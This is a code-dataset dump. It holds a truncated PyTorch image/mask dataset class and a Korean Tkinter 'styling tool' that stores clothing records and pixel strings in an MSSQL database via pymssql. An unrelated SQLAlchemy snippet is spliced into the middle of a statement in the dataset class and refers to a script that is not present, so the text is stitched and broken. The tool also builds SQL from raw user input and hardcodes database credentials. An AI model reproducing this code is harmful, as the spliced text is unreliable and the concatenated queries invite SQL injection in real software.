torch\r\n\r\nclass TN_Dataset(data.Dataset):\r\n def __init__(self, img_path, mask_path, csv_path, mode='train'):\r\n self.img_path = img_path\r\n self.mask_path = mask_path\r\n self.csv_path = csv_path\r\n self.mode = mode\r\n df = self.add_weight(self.csv_path, mode=False)\r\n self.ID_list, self.CATE_list = 
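# english_words.create() in the init script above raises if the table already
# exists on a second run. A hedged sketch of the idempotent variant using
# SQLAlchemy's checkfirst flag, on an in-memory engine with a trimmed schema
# (metadata.create_all(engine) behaves the same way for all tables at once):
from sqlalchemy import create_engine, MetaData, Table, Column, Integer, String

engine = create_engine('sqlite:///:memory:')
metadata = MetaData()
words = Table('english_words', metadata,
              Column('id', Integer, primary_key=True, autoincrement=True),
              Column('word', String(50)))
words.create(engine, checkfirst=True)
words.create(engine, checkfirst=True)  # second call is a no-op, not an error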
self.get_images_name(df)\r\n\r\n print(\"Found %d images\" % len(self.ID_list), self.mode)\r\n\r\n def __len__(self): return len(self.ID_list)\r\n\r\n def __getitem__(self, index):\r\n id = self.ID_list[index]\r\n cate = self.CATE_list[index]\r\n if cate == 1:\r\n CATE = np.array(1)\r\n else:\r\n CATE = np.array(0)\r\n\r\n CATE = torch.from_numpy(CATE).type(torch.LongTensor)\r\n\r\n image = cv2.imread(os.path.join(self.img_path, id), cv2.IMREAD_GRAYSCALE)\r\n mask = cv2.imread(os.path.join(self.mask_path, id), cv2.IMREAD_GRAYSCALE)\r\n image_size = image.shape[:2]\r\n image = cv2.resize(image, (256, 256), interpolation=cv2.INTER_AREA)\r\n mask = cv2.resize(mask, (256, 256), interpolation=cv2.INTER_NEAREST)\r\n image =image/255\r\n mask = mask/255\r\n image = torch.from_numpy(image).type(torch.FloatTensor)\r\n mask = torch.from_numpy(mask).type(torch.FloatTensor)\r\n image = torch.unsqueeze(image, axis=0)\r\n mask = torch.unsqueeze(mask, axis=0)\r\n output_dict = dict(img=image, mask=mask, ID=id, CATE=CATE, size=image_size)\r\n\r\n return output_dict\r\n\r\n def add_weight(self, csv_path, mode=False):\r\n df = pd.read_csv(csv_path)\r\n weights = []\r\n if mode is False:\r\n for i in range(len(df)):\r\n id = df['ID'][i]\r\n weight = 1\r\n weights.append(weight)\r\n weights_df = pd.DataFrame({'weight': weights})\r\n df = pd.concat([df, weights_df], axis=1)\r\n return df\r\n\r\n\r\n def get_images_name(self, df):\r\n ID_list = []\r\n CATE_list = []\r\n if self.mode == 'train':\r\n for i in range(3280):\r\n weight = df['weight'][i]\r\n for j in range(weight):\r\n if j == 0:\r\n ID_list.append(df['ID'][i])\r\n CATE_list.append(df['CATE'][i])\r\n else:\r\n ID_list.append('aug_' + df['ID'][i])\r\n CATE_list.append(df['CATE'][i])\r\n\r\n elif self.mode == 'val':\r\n for i in range(len(df) - 3280):\r\n ID_list.append(df['ID'][i + 3280])\r\n CATE_list.append(df['CATE'][i + 3280])\r\n\r\n return ID_list, CATE_list\r\n\r\nclass TN_test_dataset(data.Dataset):\r\n def __init__(self, img_path):\r\n self.img_path = img_path\r\n self.id_list = self.get_id_list()\r\n\r\n def __len__(self): return len(self.id_list)\r\n\r\n def __getitem__(self, index):\r\n file_name = self.id_list[index]\r\n file_path = os.path.join(self.img_path, file_name)\r\n\r\n image = cv2.imread(file_path, cv2.IMREAD_GRAYSCALE)\r\n image_size = image.shape[:2]\r\n image = cv2.resize(image, (256, 256), interpolation=cv2.INTER_AREA)\r\n image = image / 255\r\n image = torch.from_numpy(image).type(torch.FloatTensor)\r\n image = torch.unsqueeze(image, axis=0)\r\n\r\n output_dict = dict(img=image, ID=file_name, size=image_size)\r\n return output_dict\r\n\r\n def get_id_list(self):\r\n id_list = os.listdir(self.img_path)\r\n return id_list","sub_path":"TN_Data.py","file_name":"TN_Data.py","file_ext":"py","file_size_in_byte":3637,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"114445197","text":"from tkinter import *\nfrom tkinter.filedialog import askopenfilename\n\nimport matplotlib as plt\nimport pymssql\nimport DBConn\nimport printM\nimport Search\nfrom tkinter import ttk, messagebox\nimport tempfile\nfrom PIL import Image\nimport numpy as np\nimport cv2\n\n#Global variables....\nglobal window, variable, fullFrame, canvas, paper, itemList\n\ncanvas,paper=None, None\n\nIP_ADDR = '192.168.111.130'\nDB_NAME = 'khyProject'\nUSER_NAME = 'root'\nUSER_PASS = '1234'\n\nwindow = Tk(); window.title(\"스타일링 툴(ver 0.0.1\")\nwindow.geometry(\"800x500\")\nfullFrame=Frame(window); 
fullFrame.pack()\n\nitemList = ['shirts', 'pants', 'shoes', 'bag'] # 0,1,2,3,4\n\n\n### Define Functions...\n\ndef getItemidx(itemName):\n itemList=['shirts', 'pants', 'shoes', 'bag'] # 0,1,2,3,4\n cnt=0\n for item in itemList:\n if item ==itemName:\n break\n cnt+=1\n return cnt\ndef sear1():\n global variable, fullFrame,listIDX, listCOMM,listCOLOR, itemList\n\n cnt=getItemidx(variable.get())\n\n con = pymssql.connect(host=IP_ADDR, user=USER_NAME, password=USER_PASS, database=DB_NAME, charset='utf8')\n cur = con.cursor()\n\n query=\"select Cloths.mainColor, Cloths.comment from Cloths where categoryType in (select idx from Category where cname ='\"+itemList[cnt]+\"')\"\n print(query)\n cur.execute(query)\n\n colorList, commentList,idxList=[],[],[]\n cnt=1\n while True:\n row = cur.fetchone()\n if row == None or row == \"\":\n break\n colorList.append(row[0])\n #cnameList.append(row[1])\n commentList.append(row[1])\n idxList.append(cnt)\n cnt+=1\n\n listIDX.delete(0, listIDX.size() - 1)\n listCOMM.delete(0, listCOMM.size() - 1)\n #listRECE.delete(0, listRECE.size() - 1)\n listCOLOR.delete(0, listCOLOR.size() - 1)\n\n\n for idx, color, comment in zip(idxList,colorList, commentList):\n listIDX.insert(END, idx)\n listCOLOR.insert(END, color)\n #listRECE.insert(END, cname)\n listCOMM.insert(END, comment)\n\n cur.close()\n con.close()\n\ndef menuSearch1():\n ######## MENU 1. 검색 ########\n\n global variable, fullFrame,listIDX, listCOMM,listCOLOR\n\n if fullFrame != None :\n fullFrame.destroy()\n\n fullFrame=Frame(window); fullFrame.pack()\n frame1 = Frame(fullFrame); frame1.pack()\n\n itemList = ['shirts', 'pants', 'shoes', 'bag'] # 0,1,2,3,4\n\n variable = StringVar(frame1)\n variable.set(itemList[0]) #initial value\n\n w=OptionMenu(frame1, variable, *itemList)\n w.pack(side=LEFT)\n btn1 = Button(frame1, text=\"검색\", command=sear1);btn1.pack(side=RIGHT)\n\n\n ####### 검색 결과 화면 ######\n frame2 = Frame(fullFrame); frame2.pack(side=TOP, expand=1)\n idx=Label(frame2, text=\"번호\");idx.pack(side=LEFT, padx=60)\n color=Label(frame2, text=\"메인 컬러\");color.pack(side=LEFT, padx=40)\n cType=Label(frame2, text=\"형식\");cType.pack(side=LEFT, padx=50)\n comment=Label(frame2, text=\"설명\");comment.pack(side=LEFT, padx=40)\n\n frame3 = Frame(fullFrame); frame3.pack(side=BOTTOM, expand=1)\n listIDX=Listbox(frame3); listIDX.pack(side=LEFT)\n listCOLOR=Listbox(frame3); listCOLOR.pack(side=LEFT)\n #listRECE = Listbox(frame3); listRECE.pack(side=LEFT)\n listCOMM= Listbox(frame3); listCOMM.pack(side=LEFT)\n\n return\ndef makeEmptyRGBList():\n\n global fullFrame, inW, inH\n\n R, G, B = [], [], [] # 초기화\n for _ in range(inH):\n tmp = []\n for _ in range(inW):\n tmp.append(0)\n R.append(tmp)\n for _ in range(inH):\n tmp = []\n for _ in range(inW):\n tmp.append(0)\n G.append(tmp)\n for _ in range(inH):\n tmp = []\n for _ in range(inW):\n tmp.append(0)\n B.append(tmp)\n return R,G,B\ndef loadImageColor(fname) :\n global window, canvas, paper, inW, inH, outW, outH, inImageR, inImageG, inImageB, outImageR, outImageG, outImageB, filename, photo,text\n\n # 파일 크기 계산\n photo = Image.open(fname)\n inW = photo.width; inH = photo.height\n\n ### inImageR, G, B 초기화 to Numpy\n inImageR = np.zeros((inH, inW), dtype=np.uint8)\n inImageG = np.zeros((inH, inW), dtype=np.uint8)\n inImageB = np.zeros((inH, inW), dtype=np.uint8)\n\n # 파일 --> 메모리로 한개씩 옮기기\n text=\"\"\n photoRGB = photo.convert('RGB')\n for i in range(inH) :\n for k in range(inW) :\n r, g, b = photoRGB.getpixel((k, i)) #\n inImageR[i][k] = r; inImageG[i][k] = g; inImageB[i][k] = 
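# getItemidx above re-implements list.index with a manual counter, falling
# through to len(itemList) for unknown names. The built-in form, with an
# explicit fallback preserving that out-of-range behaviour:
def get_item_idx(item_list, item_name):
    try:
        return item_list.index(item_name)
    except ValueError:
        return len(item_list)  # same sentinel the manual loop produced

print(get_item_idx(['shirts', 'pants', 'shoes', 'bag'], 'shoes'))  # 2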
b\n text+=\"(\"+str(r)+\",\"+str(g)+\",\"+str(b)+\")\"\n #print(str(i/inH)+\" 진행중 ...\")\n # print(inImageR[100][100],inImageG[100][100],inImageB[100][100])\n print(\"[Image loading] END...\")\n\ndef openImage() :\n global window, canvas, paper, inW, inH, outW, outH, inImageR, inImageG, inImageB, outImageR, outImageG, outImageB, filename\n filename = askopenfilename(parent=window, filetypes=((\"영상 파일\", \"*.gif;*.jpg;*.png;*.bmp;*.tif\"), (\"모든 파일\", \"*.*\")))\n if filename == \"\" or filename == None :\n return\n # 파일 --> 메모리\n loadImageColor(filename)\n\n # Input --> outPut으로 동일하게 만들기.\n equalImageColor()\ndef displayImageColor() :\n global window, canvas, paper, inW, inH, outW, outH, inImageR, inImageG, inImageB, outImageR, outImageG, outImageB, filename\n if canvas != None :\n canvas.destroy()\n\n ### 고정된 화면을 준비 ###\n VIEW_X, VIEW_Y = 512,512\n if VIEW_X >= outW or VIEW_Y >= outH : # 원영상이 256이하면\n VIEW_X = outW; VIEW_Y = outH\n step = 1\n else:\n if outW > outH:\n step = outW // VIEW_X\n else:\n step = outH // VIEW_Y\n\n window.geometry(str(int(VIEW_X*1.1)) + 'x' + str(int(VIEW_Y*1.1)))\n canvas = Canvas(window, height=VIEW_Y, width=VIEW_X)\n paper = PhotoImage(height=VIEW_Y, width=VIEW_X)\n canvas.create_image((VIEW_X / 2, VIEW_Y / 2), image=paper, state='normal')\n\n rgbString = '' # 여기에 전체 픽셀 문자열을 저장할 계획\n for i in np.arange(0, outH, step) :\n tmpString = ''\n for k in np.arange(0, outW, step) :\n r, g, b = outImageR[i][k], outImageG[i][k], outImageB[i][k],\n tmpString += ' #%02x%02x%02x' % (r, g, b)\n rgbString += '{' + tmpString + '} '\n paper.put(rgbString)\n canvas.pack(expand=1, anchor=CENTER)\n status.configure(text='이미지 정보:' + str(outW) + 'x' + str(outH))\n\ndef equalImageColor() :\n global window, canvas, paper, inW, inH, outW, outH, inImageR, inImageG, inImageB, outImageR, outImageG, outImageB, filename\n\n # outImage의 크기를 결정\n outH = inH; outW = inW\n # 빈 메모리 확보 (2차원 리스트)\n outImageR, outImageG, outImageB = makeEmptyRGBList()\n\n #### 영상 처리 알고리즘을 구현 ####\n for i in range(inH) :\n for k in range(inW) :\n outImageR[i][k] = inImageR[i][k]\n outImageG[i][k] = inImageG[i][k]\n outImageB[i][k] = inImageB[i][k]\n ################################\n displayImageColor()\n\n\ndef addCloths():\n global variable,fullFrame,variable,ent1,ent2, w, inW, inH, outW, outH, inImageR, inImageG, inImageB, outImageR, outImageG, outImageB, filename,text\n\n con = pymssql.connect(host=IP_ADDR, user=USER_NAME, password=USER_PASS, database=DB_NAME,charset='utf8')\n cur = con.cursor()\n cnt=getItemidx(variable.get())\n\n\n categoryType=str(cnt+1)\n mC=str(ent1.get())\n comment=str(ent2.get())\n\n query=\"insert into Cloths(mainColor, categoryType, comment) values('\"+mC+\"', \"+categoryType+\", '\"+comment+\"')\"\n\n cur.execute(query)\n print(query)\n\n query = \"select max(idx) from Cloths\"\n cur.execute(query)\n maxIdx=str(cur.fetchone()[0])\n\n query = \"insert into Image(cloth_idx, width, height, imageInfo) values(\"+maxIdx+\", \"+str(inW)+\", \"+str(inH)+\",'\"+text+\"')\"\n\n cur.execute(query)\n\n\n cur.close()\n con.commit()\n con.close()\ndef menuAdd1():\n ######## MENU 2. 
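# The pixel-by-pixel getpixel loop in loadImageColor above is very slow on
# large images. An equivalent vectorized sketch with numpy that produces the
# same R/G/B planes without a per-pixel Python loop:
import numpy as np
from PIL import Image

def load_rgb_planes(fname):
    arr = np.asarray(Image.open(fname).convert('RGB'), dtype=np.uint8)
    return arr[:, :, 0], arr[:, :, 1], arr[:, :, 2]  # R, G, B as (H, W) arrays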
추가 ########\n\n global variable,fullFrame,variable,ent1,ent2,w\n\n if fullFrame != None:\n fullFrame.destroy()\n\n\n fullFrame=Frame(window); fullFrame.pack()\n\n\n frame1 = Frame(fullFrame); frame1.pack(side=TOP)\n\n itemList = ['shirts', 'pants', 'shoes', 'bag'] # 0,1,2,3,4\n\n variable = StringVar(frame1)\n variable.set(itemList[0]) #initial value\n\n w=OptionMenu(frame1, variable, *itemList)\n w.pack(side=LEFT)\n\n ent1 = Entry(frame1); ent1.pack(side=LEFT, padx=10) #input Main color\n ent2 = Entry(frame1); ent2.pack(side=LEFT, padx=10) #input comment\n\n btn1 = Button(frame1, text=\"추가\", command=addCloths);btn1.pack(side=LEFT, padx=10)\n\n\n frame2 = Frame(fullFrame); frame2.pack(side=BOTTOM)\n #label1 = Label(frame2); label1.pack()\n\n btn2 = Button(frame2, text=\"이미지 불러오기\", command=openImage); btn2.pack(side=LEFT, padx=10)\n return\ndef sear2():\n global variable, fullFrame\n con = pymssql.connect(host=IP_ADDR, user=USER_NAME, password=USER_PASS, database=DB_NAME,\n charset='utf8')\n cur = con.cursor()\n\n itemList = ['shirts', 'pants', 'shoes', 'bag'] # 0,1,2,3,4\n\n itemIdx = 0\n for item in itemList:\n if item == variable.get():\n break\n itemIdx += 1\n itemIdx+=1\n\n query=\"select items, wearDate from wearing order by wearDate desc\"\n cur.execute(query)\n rows=cur.fetchall()\n\n iList=[]\n dateList=[]\n for row in rows:\n iList.append(row[0]) ## 입은 옷 저장.\n dateList.append(row[1]) ## 입은 날짜 저장.\n\n for item in iList:\n print(item)\n\n cur.close()\n con.commit()\n con.close()\n return\ndef menuPrice():\n ######## MENU 3. 옷 정보 검색-가격 ########\n\n global variable, fullFrame\n\n if fullFrame != None:\n fullFrame.destroy()\n\n fullFrame = Frame(window);\n fullFrame.pack()\n frame1 = Frame(fullFrame);\n frame1.pack()\n\n itemList = ['shirts', 'pants', 'shoes', 'bag'] # 0,1,2,3,4\n\n variable = StringVar(frame1)\n variable.set(itemList[0]) # initial value\n\n w = OptionMenu(frame1, variable, *itemList)\n w.pack(side=LEFT)\n btn1 = Button(frame1, text=\"검색\", command=sear2);\n btn1.pack(side=RIGHT)\n\n # print(variable.get())\n\n ####### 검색 결과 화면 ######\n frame2 = Frame(fullFrame);\n frame2.pack(side=TOP, expand=1)\n idx = Label(frame2, text=\"번호\");idx.pack(side=LEFT, padx=60)\n comm = Label(frame2, text=\"설명\");comm.pack(side=LEFT, padx=40)\n rece = Label(frame2, text=\"최근 착용일\");rece.pack(side=LEFT, padx=50)\n image = Label(frame2, text=\"가격\");image.pack(side=LEFT, padx=40)\n\n frame3 = Frame(fullFrame);\n frame3.pack(side=BOTTOM, expand=1)\n listIDX = Listbox(frame3);\n listIDX.pack(side=LEFT)\n listCOMM = Listbox(frame3);\n listCOMM.pack(side=LEFT)\n listRECE = Listbox(frame3);\n listRECE.pack(side=LEFT)\n listImage = Listbox(frame3);\n listImage.pack(side=LEFT)\n\n return\ndef menuRecent():\n ######## MENU 3. 
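# addCloths above builds its INSERT by string concatenation, which breaks on
# quotes in the comment field and is open to SQL injection. pymssql supports
# the %s paramstyle, so a hedged parameterized sketch of the same statement
# (cur is a pymssql cursor as in addCloths):
def insert_cloth(cur, main_color, category_type, comment):
    # pymssql substitutes %s placeholders safely; no manual quoting needed
    cur.execute(
        "insert into Cloths(mainColor, categoryType, comment) values (%s, %s, %s)",
        (main_color, category_type, comment))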
옷 정보 검색 - 최근 착용일 ########\n global variable, fullFrame, sheet, rows, window2\n\n if fullFrame != None:\n fullFrame.destroy()\n\n fullFrame = Frame(window);\n fullFrame.pack()\n\n con = pymssql.connect(host=IP_ADDR, user=USER_NAME, password=USER_PASS, database=DB_NAME,charset='utf8')\n cur = con.cursor()\n\n query=\"select items from Wearing order by wearDate Desc\"\n cur.execute(query)\n\n rows=cur.fetchall()\n\n ## 새로운 윈도창 띄우기\n window2 = Toplevel(fullFrame)\n sheet = ttk.Treeview(window2, height=10);\n sheet.pack()\n descs = cur.description\n colNames = [d[0] for d in descs]\n sheet.column(\"#0\", width=80);\n sheet.heading(\"#0\", text=colNames[0])\n sheet[\"columns\"] = colNames[1:]\n for colName in colNames[1:]:\n sheet.column(colName, width=80);\n sheet.heading(colName, text=colName)\n\n for row in rows:\n sheet.insert('', 'end', text=row[0], values=row[1:])\n sheet.bind('', sheetDblClick)\n\n\n return\ndef sheetDblClick(event):\n global variable, fullFrame, sheet, rows, window2, inW, inH,outW, outH,imageInfo,inImageR, inImageG, inImageB, outImageR, outImageG, outImageB\n\n item = sheet.identify('item', event.x, event.y) # 'I001' ....\n entNum = int(item[1:]) - 1 ## 쿼리한 결과 리스트의 순번\n id = rows[entNum][0] ## 선택한 id\n window2.destroy()\n # DB에서 이미지를 다운로드\n con = pymssql.connect(host=IP_ADDR, user=USER_NAME, password=USER_PASS, database=DB_NAME,charset='utf8')\n cur = con.cursor()\n\n sql = \"SELECT imageInfo, width, height from Image where cloth_idx=\" + str(id) # ID로 이미지 추출하기\n\n cur.execute(sql)\n row = cur.fetchone()\n cur.close()\n con.close()\n\n # 임시 폴더\n imageInfo=row[0]; inW=row[1]; inH=row[2]\n print(imageInfo)\n outImageR, outImageG, outImageB = makeEmptyRGBList()\n inImageR, inImageG, inImageB = makeEmptyRGBList()\n\n start,cnt=0,0\n for i in range(inH):\n for k in range(inW):\n newStr=\"\"\n if imageInfo[start]=='(':\n start+=1\n while imageInfo[start] != ')':\n newStr=newStr+imageInfo[start]\n start+=1\n start+=2\n print(newStr)\n r=int(newStr.split(\",\")[0]); g = int(newStr.split(\",\")[1]); b=int(newStr.split(\",\")[2])\n inImageR[i][k]=r; inImageG[i][k]=g; inImageB[i][k]=b\n outImageR[i][k]=r; outImageG[i][k]=g; outImageB[i][k]=b\n outW=inW; outH=inH\n displayImageColor()\n return\ndef getImageFromDB(width, height, imageInfo):\n global inW, inH,outW, outH, outImageR, outImageG, outImageB,window,fullFrame\n if fullFrame != None:\n fullFrame.destroy()\n print(imageInfo)\n inW=outW=width; inH=outH=height\n R,G,B=makeEmptyRGBList()\n outImageR,outImageG,outImageB=makeEmptyRGBList()\n idx=1\n #cnt=0\n for i in range(height):\n for k in range(width):\n text=\"\"\n while imageInfo[idx] != \")\":\n # cnt+=1\n # if cnt ==30 : break\n text+=imageInfo[idx]\n idx+=1\n idx+=2\n # if cnt==30 : break\n #print(text)\n tList=text.split(\",\")\n R[i][k]=int(tList[0]); G[i][k]=int(tList[1]); B[i][k]=int(tList[2])\n # if cnt==30 : break\n outImageR=R[:]; outImageG=G[:]; outImageB=B[:]\n\n ### 고정된 화면을 준비 ###\n VIEW_X, VIEW_Y = 512, 512\n if VIEW_X >= outW or VIEW_Y >= outH: # 원영상이 256이하면\n VIEW_X = outW;\n VIEW_Y = outH\n step = 1\n else:\n if outW > outH:\n step = outW // VIEW_X\n else:\n step = outH // VIEW_Y\n\n newWindow=Tk()\n newWindow.geometry(str(int(VIEW_X * 1.1)) + 'x' + str(int(VIEW_Y * 1.1)))\n canvas = Canvas(newWindow, height=VIEW_Y, width=VIEW_X)\n paper = PhotoImage(master=canvas, height=VIEW_Y, width=VIEW_X)\n canvas.create_image((VIEW_X / 2, VIEW_Y / 2), image=paper, state='normal')\n\n rgbString = '' # 여기에 전체 픽셀 문자열을 저장할 계획\n for i in np.arange(0, outH, step):\n tmpString 
def getImageFromDB(width, height, imageInfo):\n    global inW, inH,outW, outH, outImageR, outImageG, outImageB,window,fullFrame\n    if fullFrame != None:\n        fullFrame.destroy()\n    print(imageInfo)\n    inW=outW=width; inH=outH=height\n    R,G,B=makeEmptyRGBList()\n    outImageR,outImageG,outImageB=makeEmptyRGBList()\n    idx=1\n    #cnt=0\n    for i in range(height):\n        for k in range(width):\n            text=\"\"\n            while imageInfo[idx] != \")\":\n                # cnt+=1\n                # if cnt ==30 : break\n                text+=imageInfo[idx]\n                idx+=1\n            idx+=2\n            # if cnt==30 : break\n            #print(text)\n            tList=text.split(\",\")\n            R[i][k]=int(tList[0]); G[i][k]=int(tList[1]); B[i][k]=int(tList[2])\n        # if cnt==30 : break\n    outImageR=R[:]; outImageG=G[:]; outImageB=B[:]\n\n    ### Prepare a fixed-size view ###\n    VIEW_X, VIEW_Y = 512, 512\n    if VIEW_X >= outW or VIEW_Y >= outH:  # if the source image fits inside the view\n        VIEW_X = outW;\n        VIEW_Y = outH\n        step = 1\n    else:\n        if outW > outH:\n            step = outW // VIEW_X\n        else:\n            step = outH // VIEW_Y\n\n    newWindow=Tk()\n    newWindow.geometry(str(int(VIEW_X * 1.1)) + 'x' + str(int(VIEW_Y * 1.1)))\n    canvas = Canvas(newWindow, height=VIEW_Y, width=VIEW_X)\n    paper = PhotoImage(master=canvas, height=VIEW_Y, width=VIEW_X)\n    canvas.create_image((VIEW_X / 2, VIEW_Y / 2), image=paper, state='normal')\n\n    rgbString = ''  # accumulate the whole pixel string here\n    for i in np.arange(0, outH, step):\n        tmpString = ''\n        for k in np.arange(0, outW, step):\n            r, g, b = outImageR[i][k], outImageG[i][k], outImageB[i][k]\n            tmpString += ' #%02x%02x%02x' % (r, g, b)\n        rgbString += '{' + tmpString + '} '\n    paper.put(rgbString)\n    canvas.pack(expand=1, anchor=CENTER)\n    status.configure(text='이미지 정보:' + str(outW) + 'x' + str(outH))\n    newWindow.mainloop()\n    return\n\n\ndef menuAddStyleBook():\n    ######## MENU 5. Style Book ########\n    global variable, fullFrame, sheet, rows, window2,inW, inH,imageInfo\n\n    if fullFrame != None:\n        fullFrame.destroy()\n\n    fullFrame = Frame(window);fullFrame.pack(expand=1)\n    frame1 = Frame(fullFrame);frame1.pack(expand=1)\n\n    label1= Label(frame1, text=\"<< 필터 적용 후 스타일북에 저장하기>> \"); label1.pack(side=TOP)\n\n\n\n    btn1 = Button(frame1, text=\"이미지 불러오기\", command=sear2);\n    btn1.pack(side=RIGHT)\n    btn2 = Button(frame1, text=\"스타일북에 저장하기\", command=sear2);btn2.pack(side=RIGHT)\n    con = pymssql.connect(host=IP_ADDR, user=USER_NAME, password=USER_PASS, database=DB_NAME, charset='utf8')\n    cur = con.cursor()\n\n\n    query=\"select idx,mainColor, categoryType, comment from Cloths\"\n    cur.execute(query)\n    rows=cur.fetchall()\n\n    ## Show the list in a new window\n    window2 = Toplevel(window); window2.geometry(\"600x600\")\n    sheet = ttk.Treeview(window2);sheet.pack(expand=1)\n    descs = cur.description\n    colNames = [d[0] for d in descs]\n    sheet.column(\"#0\", width=80);\n    sheet.heading(\"#0\", text=colNames[0])\n    sheet[\"columns\"] = colNames[1:]\n    for colName in colNames[1:]:\n        sheet.column(colName, width=200);\n        sheet.heading(colName, text=colName)\n    for row in rows:\n        sheet.insert('', 'end', text=row[0], values=row[1:])\n    sheet.bind('<Double-1>', sheetDblClick)\n\n    cur.close()\n    con.close()\n\n\n\n\n    return
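`menuRecent` above, `menuAddStyleBook`, and `menuCallStyle` below all repeat the same Treeview boilerplate: derive column names from `cursor.description`, configure each column, then insert the fetched rows. A small helper would collapse the three copies. This sketch reuses the file's Tkinter/pymssql setup; `showQueryResults` and its `col_width` parameter are hypothetical names, not part of the original program.

```python
def showQueryResults(parent, cursor, rows, on_double_click=None, col_width=80):
    # Show a fetched result set in a Treeview inside a new Toplevel window.
    win = Toplevel(parent)
    sheet = ttk.Treeview(win, height=10)
    sheet.pack(expand=1)
    colNames = [d[0] for d in cursor.description]
    sheet.column('#0', width=col_width)
    sheet.heading('#0', text=colNames[0])
    sheet['columns'] = colNames[1:]
    for colName in colNames[1:]:
        sheet.column(colName, width=col_width)
        sheet.heading(colName, text=colName)
    for row in rows:
        sheet.insert('', 'end', text=row[0], values=row[1:])
    if on_double_click is not None:
        sheet.bind('<Double-1>', on_double_click)
    return win, sheet
```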
def menuRemoveBG():\n    global fullFrame, filename, inH, inW\n\n    if fullFrame != None:\n        fullFrame.destroy()\n\n    fullFrame = Frame(window);\n    fullFrame.pack()\n    filename = askopenfilename(parent=window, filetypes=((\"영상 파일\", \"*.gif;*.jpg;*.png;*.bmp;*.tif\"), (\"모든 파일\", \"*.*\")))\n    if filename == \"\" or filename == None:\n        return\n\n    # == Parameters =======================================================================\n    BLUR = 21\n    CANNY_THRESH_1 = 10\n    CANNY_THRESH_2 = 200\n    MASK_DILATE_ITER = 10\n    MASK_ERODE_ITER = 10\n    MASK_COLOR = (1.0, 1.0, 1.0)  # In BGR format\n\n    # == Processing =======================================================================\n\n    # -- Read image -----------------------------------------------------------------------\n    img = cv2.imread(filename)\n    gray = cv2.cvtColor(img, cv2.COLOR_BGR2GRAY)\n\n    # -- Edge detection -------------------------------------------------------------------\n    edges = cv2.Canny(gray, CANNY_THRESH_1, CANNY_THRESH_2)\n    edges = cv2.dilate(edges, None)\n    edges = cv2.erode(edges, None)\n\n    # -- Find contours in edges, sort by area ---------------------------------------------\n    contour_info = []\n    # In older OpenCV releases findContours returned three values:\n    #_, contours, _ = cv2.findContours(edges, cv2.RETR_LIST, cv2.CHAIN_APPROX_NONE)\n    contours, _ = cv2.findContours(edges, cv2.RETR_LIST, cv2.CHAIN_APPROX_NONE)\n    for c in contours:\n        contour_info.append((\n            c,\n            cv2.isContourConvex(c),\n            cv2.contourArea(c),\n        ))\n    contour_info = sorted(contour_info, key=lambda c: c[2], reverse=True)\n    max_contour = contour_info[0]\n\n    # -- Create empty mask, draw filled polygon on it corresponding to largest contour ----\n    # Mask is black, polygon is white\n    mask = np.zeros(edges.shape)\n    cv2.fillConvexPoly(mask, max_contour[0], (255))\n\n    # -- Smooth mask, then blur it --------------------------------------------------------\n    mask = cv2.dilate(mask, None, iterations=MASK_DILATE_ITER)\n    mask = cv2.erode(mask, None, iterations=MASK_ERODE_ITER)\n    mask = cv2.GaussianBlur(mask, (BLUR, BLUR), 0)\n    mask_stack = np.dstack([mask] * 3)  # Create 3-channel alpha mask\n\n    # -- Blend masked img into MASK_COLOR background --------------------------------------\n    mask_stack = mask_stack.astype('float32') / 255.0  # Use float matrices,\n    img = img.astype('float32') / 255.0  # for easy blending\n\n    masked = (mask_stack * img) + ((1 - mask_stack) * MASK_COLOR)  # Blend\n    masked = (masked * 255).astype('uint8')  # Convert back to 8-bit\n\n    cv2.imshow('img',masked)  # Display\n    cv2.imwrite('C:/Users/B-17/Desktop/DB project/afterImages/person-masked.jpg', masked)# Save
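`menuRemoveBG` blends the cutout onto a flat `MASK_COLOR` background before saving it as a JPEG. If a later step (for example compositing outfits in the style book) needs real transparency instead, the same smoothed mask can be written as a PNG alpha channel. A hedged sketch under those assumptions — `save_with_alpha` and its default path are hypothetical, and `img`/`mask` are assumed to be the uint8 BGR image and the smoothed single-channel mask from above:

```python
import cv2
import numpy as np

def save_with_alpha(img, mask, out_path='person-masked.png'):
    # Keep the subject opaque and the background transparent instead of white.
    alpha = np.clip(mask, 0, 255).astype('uint8')
    bgra = cv2.cvtColor(img, cv2.COLOR_BGR2BGRA)  # add an alpha channel
    bgra[:, :, 3] = alpha                         # transparency follows the mask
    cv2.imwrite(out_path, bgra)                   # PNG preserves alpha; JPEG would not
```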
def menuPrint():\n    ######## MENU 6. Print ########\n\n\n    printM.printFile()\n\n\ndef sheetDblClick2(event):\n    global variable, fullFrame, sheet, rows, window2, inW, inH,outW, outH,imageInfo,inImageR, inImageG, inImageB, outImageR, outImageG, outImageB\n\n    item = sheet.identify('item', event.x, event.y)  # 'I001' ....\n    entNum = int(item[1:]) - 1  ## index of the row in the query result list\n    id = rows[entNum][0]  ## selected id\n    window2.destroy()\n    # Download the images from the DB\n    con = pymssql.connect(host=IP_ADDR, user=USER_NAME, password=USER_PASS, database=DB_NAME,charset='utf8')\n    cur = con.cursor()\n\n    sql= \"select items from Wearing where idx=\"+str(id)\n    print(sql)\n    cur.execute(sql)\n    row = cur.fetchone()\n\n    itemList=row[0].split(\",\")\n    imgCnt=len(itemList)\n    print(imgCnt)\n\n    for item in itemList:\n        print(\"item : \", item)\n        query=\"select width, height, imageInfo, cloth_idx from Image where cloth_idx=\"+item\n        #print(query)\n        cur.execute(query)\n        row=cur.fetchone()\n        getImageFromDB(row[0], row[1], row[2])\n\n\n\n\n    cur.close()\n    con.close()\n\n    return\n\ndef menuCallStyle():\n    global variable, fullFrame, sheet, rows, window2\n\n    if fullFrame != None:\n        fullFrame.destroy()\n\n    fullFrame = Frame(window);\n    fullFrame.pack()\n\n    con = pymssql.connect(host=IP_ADDR, user=USER_NAME, password=USER_PASS, database=DB_NAME, charset='utf8')\n    cur = con.cursor()\n\n    query = \"select idx, wearDate from Wearing order by wearDate Desc\"\n    cur.execute(query)\n\n    rows = cur.fetchall()\n\n    ## Show the results in a new window\n    window2 = Toplevel(fullFrame)\n    sheet = ttk.Treeview(window2, height=10);\n    sheet.pack()\n    descs = cur.description\n    colNames = [d[0] for d in descs]\n    sheet.column(\"#0\", width=80);\n    sheet.heading(\"#0\", text=colNames[0])\n    sheet[\"columns\"] = colNames[1:]\n    for colName in colNames[1:]:\n        sheet.column(colName, width=80);\n        sheet.heading(colName, text=colName)\n\n    for row in rows:\n        sheet.insert('', 'end', text=row[0], values=row[1:])\n    sheet.bind('<Double-1>', 